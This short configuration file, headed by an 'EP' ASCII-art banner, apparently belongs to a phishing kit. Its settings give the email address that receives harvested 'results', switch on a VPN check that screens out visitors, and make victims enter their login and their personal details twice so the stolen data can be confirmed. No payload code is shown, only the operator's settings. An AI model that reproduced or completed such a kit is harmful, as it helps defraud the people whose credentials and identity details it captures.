; .------..------.
; |E.--. ||P.--. |
; | (\/) || :/\: |
; | :\/: || (__) |
; | '--'E|| '--'P|
; `------'`------'

; Your email for results
; Options: email address

Email = "example@email.com"

; Check if user is using a VPN
; Options: on or off

VPN = "off"

; Double login, self explanatory
; Options: on or off

LoginTwice = "on"

; Double details, self explanatory
; Options: on or off

DetailsTwice = "on"